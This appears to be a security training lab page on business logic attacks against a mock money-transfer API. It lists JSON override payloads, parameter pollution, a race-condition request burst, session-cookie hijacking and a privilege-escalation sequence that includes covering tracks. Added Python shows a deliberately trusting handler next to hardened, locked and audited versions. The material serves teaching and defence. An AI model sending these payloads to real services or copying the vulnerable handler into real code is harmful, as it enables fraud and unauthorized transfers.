Lab 5: Advanced Business Logic

Advanced business logic vulnerabilities

Difficulty: High

Lab Overview

This lab demonstrates advanced business logic vulnerabilities that combine several techniques, such as multi-layered authorization bypass, multi-step attack sequences, and exploitation of business rules that are enforced only on the client side.

Objective: Understand how advanced business logic attacks work and how to exploit them.

Vulnerable Transfer System
Money Transfer

This system allows money transfers. Try to exploit advanced business logic:

Advanced Bypass Tester
⚠️ Advanced Business Logic Warning

This lab demonstrates advanced business logic vulnerabilities:

  • Complex Authorization - Multi-layered authorization bypass
  • Business Rule Exploitation - Exploit business rules
  • Multi-Step Attacks - Complex attack sequences
  • State Manipulation - Manipulate application state
Advanced Techniques

These techniques can be used for advanced bypass:

  • Authorization Bypass - Bypass complex authorization
  • Business Rule Exploitation - Exploit business rules
  • Multi-Step Attacks - Complex attack sequences
  • State Manipulation - Manipulate application state
Users List
  • Admin User (Admin) - ID: 1, Balance: $10,000.00
  • Regular User (User) - ID: 2, Balance: $1,000.00
  • Premium User (Premium) - ID: 3, Balance: $5,000.00
Advanced Business Logic Techniques
Authorization Bypass
// Bypass complex authorization
{
  "from_user": 1,
  "to_user": 2,
  "amount": 1000,
  "transfer_type": "admin",
  "admin_override": true,
  "skip_authorization": true
}
Business Rule Exploitation
// Exploit business rules
{
  "from_user": 1,
  "to_user": 2,
  "amount": 1000,
  "transfer_type": "instant",
  "fee_waiver": true,
  "limit_override": true
}
Multi-Step Attacks
// Complex attack sequence
// Step 1: Escalate privileges
// Step 2: Bypass limits
// Step 3: Execute transfer
// Step 4: Cover tracks
State Manipulation
// Manipulate application state
{
  "from_user": 1,
  "to_user": 2,
  "amount": 1000,
  "user_role": "admin",
  "balance_override": true
}
Parameter Pollution
// Parameter pollution
{
  "from_user": 1,
  "to_user": 2,
  "amount": 1000,
  "from_user": 2,   // Override
  "amount": 0.01    // Override
}
Logic Bomb
// Logic bomb
{
  "from_user": 1,
  "to_user": 2,
  "amount": 1000,
  "condition": "if admin then amount = 0",
  "admin_check": false
}
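Every payload above only works if the server reads its authorization decisions (who the sender is, what role they hold, whether limits apply) out of the request body. The Python below is an added illustration, not code from this lab: a deliberately trusting transfer handler next to a hardened one that takes identity and role from the server-side session, allow-lists the body's fields, and rejects duplicate JSON keys instead of letting the last one win. The ledger mirrors the lab's Users List; the per-role limits, function names and the combined test payload are constructed for this example.

```python
import copy
import json

# Constructed ledger mirroring the lab's Users List (id -> role, balance).
LEDGER = {
    1: {"role": "admin",   "balance": 10_000.00},
    2: {"role": "user",    "balance": 1_000.00},
    3: {"role": "premium", "balance": 5_000.00},
}
# Assumed per-role transfer limits (not from the lab).
TRANSFER_LIMIT = {"user": 500.00, "premium": 2_000.00, "admin": 10_000.00}
# The only fields a client may send. Anything else is rejected, not silently ignored.
ALLOWED_FIELDS = {"to_user", "amount"}


def fresh_ledger():
    """Independent copy so each request/test starts from the same balances."""
    return copy.deepcopy(LEDGER)


def transfer_vulnerable(ledger, body, session_user_id):
    """Trusting handler: sender id, role and override flags all come from the client.
    json.loads keeps the LAST value of a repeated key, so "amount" can be polluted."""
    req = json.loads(body)
    sender_id = req.get("from_user", session_user_id)          # client picks the sender
    role = req.get("user_role", ledger[sender_id]["role"])      # client picks the role
    amount = req["amount"]
    if not req.get("admin_override") and amount > TRANSFER_LIMIT[role]:
        return {"ok": False, "reason": "over limit"}
    if not req.get("balance_override") and amount > ledger[sender_id]["balance"]:
        return {"ok": False, "reason": "insufficient funds"}
    ledger[sender_id]["balance"] -= amount
    ledger[req["to_user"]]["balance"] += amount
    return {"ok": True, "from": sender_id, "amount": amount}


def _no_duplicate_keys(pairs):
    """object_pairs_hook for json.loads: fail on a repeated key instead of overwriting."""
    obj = {}
    for key, value in pairs:
        if key in obj:
            raise ValueError(f"duplicate key {key!r}")
        obj[key] = value
    return obj


def transfer_hardened(ledger, body, session_user_id):
    """Hardened handler: identity and role come from the session, never the body."""
    try:  # JSONDecodeError is a ValueError, so malformed JSON and duplicates land here
        req = json.loads(body, object_pairs_hook=_no_duplicate_keys)
    except ValueError as exc:
        return {"ok": False, "reason": f"malformed body: {exc}"}
    if not isinstance(req, dict) or set(req) != ALLOWED_FIELDS:
        unexpected = sorted(set(req) ^ ALLOWED_FIELDS) if isinstance(req, dict) else []
        return {"ok": False, "reason": f"unexpected or missing fields: {unexpected}"}
    amount, to_user = req["amount"], req["to_user"]
    # bool is a subclass of int in Python, so exclude it explicitly.
    if isinstance(amount, bool) or not isinstance(amount, (int, float)):
        return {"ok": False, "reason": "amount must be a number"}
    amount = round(float(amount), 2)
    if amount <= 0:
        return {"ok": False, "reason": "amount must be positive"}
    if (isinstance(to_user, bool) or not isinstance(to_user, int)
            or to_user not in ledger or to_user == session_user_id):
        return {"ok": False, "reason": "invalid recipient"}
    sender = ledger[session_user_id]                            # authoritative identity
    if amount > TRANSFER_LIMIT[sender["role"]]:                 # authoritative role
        return {"ok": False, "reason": "over limit"}
    if amount > sender["balance"]:
        return {"ok": False, "reason": "insufficient funds"}
    sender["balance"] -= amount
    ledger[to_user]["balance"] += amount
    return {"ok": True, "from": session_user_id, "amount": amount}
```

The two handlers differ in one design decision: the hardened one treats the request body as untrusted input that names a recipient and an amount, and nothing else; every field the lab's payloads rely on (`from_user`, `user_role`, `admin_override`, `balance_override`, `skip_authorization`) is simply not part of the accepted schema, so it is rejected before any business rule runs.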
Vulnerability Details
  • Type: Advanced Business Logic
  • Severity: Critical
  • Method: Multiple techniques
  • Issue: Complex vulnerabilities
Attack Vectors
  • Authorization Bypass: Bypass complex authorization
  • Business Rule Exploitation: Exploit business rules
  • Multi-Step Attacks: Complex attack sequences
  • State Manipulation: Manipulate application state
Advanced Business Logic Examples

Use these techniques to exploit advanced business logic vulnerabilities:

1. Authorization Bypass:
// Bypass complex authorization
{
  "from_user": 1,
  "to_user": 2,
  "amount": 1000,
  "transfer_type": "admin",
  "admin_override": true,
  "skip_authorization": true,
  "user_role": "admin",
  "permissions": ["transfer", "admin", "override"]
}
2. Business Rule Exploitation:
// Exploit business rules
{
  "from_user": 1,
  "to_user": 2,
  "amount": 1000,
  "transfer_type": "instant",
  "fee_waiver": true,
  "limit_override": true,
  "business_rule_bypass": true,
  "validation_skip": true
}
3. Multi-Step Attack:
// Step 1: Escalate privileges
POST /escalate_privileges
{ "user_id": 1, "target_role": "admin", "escalation_reason": "emergency" }
// Step 2: Bypass limits
POST /bypass_limits
{ "user_id": 1, "limit_type": "transfer", "new_limit": 999999 }
// Step 3: Execute transfer
POST /transfer
{ "from_user": 1, "to_user": 2, "amount": 1000, "admin_override": true }
4. State Manipulation:
// Manipulate application state
{
  "from_user": 1,
  "to_user": 2,
  "amount": 1000,
  "user_role": "admin",
  "balance_override": true,
  "state_manipulation": true,
  "session_hijack": true
}
5. Parameter Pollution:
// Parameter pollution
{
  "from_user": 1,
  "to_user": 2,
  "amount": 1000,
  "from_user": 2,   // Override
  "amount": 0.01,   // Override
  "transfer_type": "admin",
  "admin_override": true
}
6. Logic Bomb:
// Logic bomb
{
  "from_user": 1,
  "to_user": 2,
  "amount": 1000,
  "condition": "if admin then amount = 0",
  "admin_check": false,
  "logic_bomb": true,
  "exploit_condition": true
}
7. Race Condition Exploitation:
// Exploit race conditions
const promises = [];
for (let i = 0; i < 10; i++) {
  promises.push(
    fetch('/transfer', {
      method: 'POST',
      body: JSON.stringify({ from_user: 1, to_user: 2, amount: 1000, admin_override: true })
    })
  );
}
Promise.all(promises);
8. Session Hijacking:
// Session hijacking
const adminSession = 'admin_session_token';
fetch('/transfer', {
  method: 'POST',
  headers: { 'Cookie': `session_id=${adminSession}` },
  body: JSON.stringify({ from_user: 1, to_user: 2, amount: 1000 })
});
9. API Endpoint Manipulation:
// Manipulate API endpoints
// Use different endpoints
fetch('/admin/transfer', { method: 'POST', body: 'amount=1000' });
fetch('/internal/transfer', { method: 'POST', body: 'amount=1000' });
fetch('/bypass/transfer', { method: 'POST', body: 'amount=1000' });
10. Business Logic Bypass:
// Bypass business logic
{
  "from_user": 1,
  "to_user": 2,
  "amount": 1000,
  "business_logic_override": true,
  "validation_skip": true,
  "rule_bypass": true,
  "admin_override": true
}
11. Complex Authorization Bypass:
// Complex authorization bypass
{
  "from_user": 1,
  "to_user": 2,
  "amount": 1000,
  "authorization": {
    "level": "admin",
    "permissions": ["transfer", "admin", "override"],
    "bypass": true,
    "skip_checks": true
  }
}
12. Business Rule Manipulation:
// Manipulate business rules
{
  "from_user": 1,
  "to_user": 2,
  "amount": 1000,
  "business_rules": {
    "max_transfer": 999999,
    "fee_waiver": true,
    "limit_override": true,
    "validation_skip": true
  }
}
13. State Machine Bypass:
// Bypass state machine
{
  "from_user": 1,
  "to_user": 2,
  "amount": 1000,
  "state_machine": {
    "current_state": "completed",
    "target_state": "completed",
    "skip_states": ["pending", "approved"],
    "state_override": true
  }
}
14. Workflow Bypass:
// Bypass workflow
{
  "from_user": 1,
  "to_user": 2,
  "amount": 1000,
  "workflow": {
    "skip_approval": true,
    "admin_override": true,
    "workflow_bypass": true,
    "direct_execution": true
  }
}
15. Advanced Parameter Manipulation:
// Advanced parameter manipulation
{
  "from_user": 1,
  "to_user": 2,
  "amount": 1000,
  "parameters": {
    "admin_override": true,
    "skip_validation": true,
    "bypass_limits": true,
    "direct_execution": true,
    "privilege_escalation": true
  }
}
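Example 7 works for a different reason than the rest of the list: even with every client field ignored, a handler that reads the balance, checks it, and then writes the debit as three separate operations lets ten parallel requests all pass the check against the same snapshot. The Python below is an added illustration, not code from this lab: a check-then-act transfer reproduced deterministically with a barrier standing in for the request burst, next to a version that performs the check and both updates under per-account locks taken in a fixed order. Account balances, the `Account` class and the `rendezvous` test hook are constructed for this example.

```python
import threading
from dataclasses import dataclass, field


@dataclass
class Account:
    balance: float
    lock: threading.Lock = field(default_factory=threading.Lock)


def transfer_racy(accounts, frm, to, amount, rendezvous=None):
    """Check-then-act with no atomicity between the check and the write.
    `rendezvous` is a test hook (a threading.Barrier): every thread finishes its
    check before any thread writes, which is exactly the interleaving a burst of
    parallel requests produces on a loaded server."""
    src, dst = accounts[frm], accounts[to]
    snapshot = src.balance                    # 1. read
    if snapshot < amount:                     # 2. check
        return False
    if rendezvous is not None:
        rendezvous.wait()
    src.balance = snapshot - amount           # 3. write from the stale snapshot
    dst.balance += amount
    return True


def transfer_safe(accounts, frm, to, amount):
    """Check and both updates happen under the locks of both accounts.
    Locks are always taken in ascending id order so two opposite transfers
    (1->2 and 2->1) cannot deadlock each other."""
    first, second = sorted((frm, to))
    with accounts[first].lock, accounts[second].lock:
        src, dst = accounts[frm], accounts[to]
        if src.balance < amount:
            return False
        src.balance -= amount
        dst.balance += amount
        return True


def fire_burst(transfer, n=10, amount=1000.0, use_rendezvous=False):
    """Run `n` identical transfers of `amount` from account 1 to 2 in parallel.
    Returns (successful transfers, sender balance, recipient balance)."""
    accounts = {1: Account(1_000.0), 2: Account(1_000.0)}   # constructed balances
    barrier = threading.Barrier(n) if use_rendezvous else None
    results = []

    def worker():
        kwargs = {"rendezvous": barrier} if barrier is not None else {}
        results.append(transfer(accounts, 1, 2, amount, **kwargs))

    threads = [threading.Thread(target=worker) for _ in range(n)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    return sum(results), accounts[1].balance, accounts[2].balance


if __name__ == "__main__":
    print("racy :", fire_burst(transfer_racy, use_rendezvous=True))   # 10 transfers from a $1,000 account
    print("safe :", fire_burst(transfer_safe))                        # exactly 1 succeeds
```

In a real service the lock is the database: either `SELECT ... FOR UPDATE` on the sender row inside one transaction, or a single conditional `UPDATE accounts SET balance = balance - :amt WHERE id = :id AND balance >= :amt` whose affected-row count decides whether the transfer happened. An idempotency key per client request additionally collapses a replayed burst of the same transfer into one.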
Real-World Attack Scenarios
Mitigation Strategies
  • Implement comprehensive business logic validation
  • Use secure authorization and access controls
  • Implement proper state management
  • Use secure coding practices
  • Regular security testing and vulnerability assessments
  • Monitor for unusual business logic patterns
  • Implement proper input validation
  • Use secure session management
  • Implement proper error handling
  • Educate users about security threats
  • Use multi-factor authentication
  • Implement proper logging and monitoring
  • Use business logic verification systems
  • Implement proper audit trails
  • Use threat intelligence and monitoring
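"Implement proper state management" and "implement proper audit trails" are the controls that defeat examples 13 and 14 above. The Python below is an added illustration, not code from this lab: a transfer workflow whose only source of truth is the stored state, with a server-side transition table that fixes which step may follow which and which role may perform it, a separation-of-duties rule so an initiator cannot approve their own transfer, and an audit log that records denied attempts (including any client-supplied state fields) as well as successful transitions. The `Transfer` class, roles, action names and transition table are constructed for this example.

```python
from dataclasses import dataclass, field
from datetime import datetime, timezone

# Server-side transition table: (current state, next state) -> roles allowed to perform it.
# There is deliberately no edge from "pending" straight to "completed".
TRANSITIONS = {
    ("pending", "approved"): {"approver"},
    ("pending", "rejected"): {"approver"},
    ("approved", "completed"): {"system"},
}
# The client may only name an action; the target state is derived on the server.
ACTIONS = {"approve": "approved", "reject": "rejected", "complete": "completed"}
ALLOWED_REQUEST_FIELDS = {"action"}


@dataclass
class Transfer:
    transfer_id: str
    amount: float
    initiator_id: int
    state: str = "pending"            # authoritative; never read from a request
    audit: list = field(default_factory=list)


def _log(transfer, actor_id, event, **details):
    transfer.audit.append({
        "at": datetime.now(timezone.utc).isoformat(),
        "actor": actor_id,
        "event": event,
        **details,
    })


def advance(transfer, request, actor_id, actor_role):
    """Apply one workflow step. Returns True on a legal transition, False otherwise;
    every outcome is written to the transfer's audit trail."""
    extra = sorted(set(request) - ALLOWED_REQUEST_FIELDS)
    if extra:  # e.g. current_state, skip_states, state_override, skip_approval
        _log(transfer, actor_id, "denied", reason="unexpected fields", fields=extra)
        return False
    target = ACTIONS.get(request.get("action"))
    if target is None:
        _log(transfer, actor_id, "denied", reason="unknown action")
        return False
    allowed_roles = TRANSITIONS.get((transfer.state, target))
    if allowed_roles is None:
        _log(transfer, actor_id, "denied", reason="illegal transition",
             from_state=transfer.state, to_state=target)
        return False
    if actor_role not in allowed_roles:
        _log(transfer, actor_id, "denied", reason="role not permitted", role=actor_role)
        return False
    if target == "approved" and actor_id == transfer.initiator_id:
        _log(transfer, actor_id, "denied", reason="separation of duties")
        return False
    _log(transfer, actor_id, "transition", from_state=transfer.state, to_state=target)
    transfer.state = target
    return True


def denied_events(transfer):
    """Audit entries worth alerting on: repeated denials against one transfer are the
    'unusual business logic pattern' the mitigation list refers to."""
    return [e for e in transfer.audit if e["event"] == "denied"]
```

Usage: `advance(t, {"action": "approve"}, actor_id=1, actor_role="approver")` moves a pending transfer to approved; a request carrying the lab's `state_machine` or `workflow` fields is denied before the action is even looked at, and the denial is what the monitoring side should be counting.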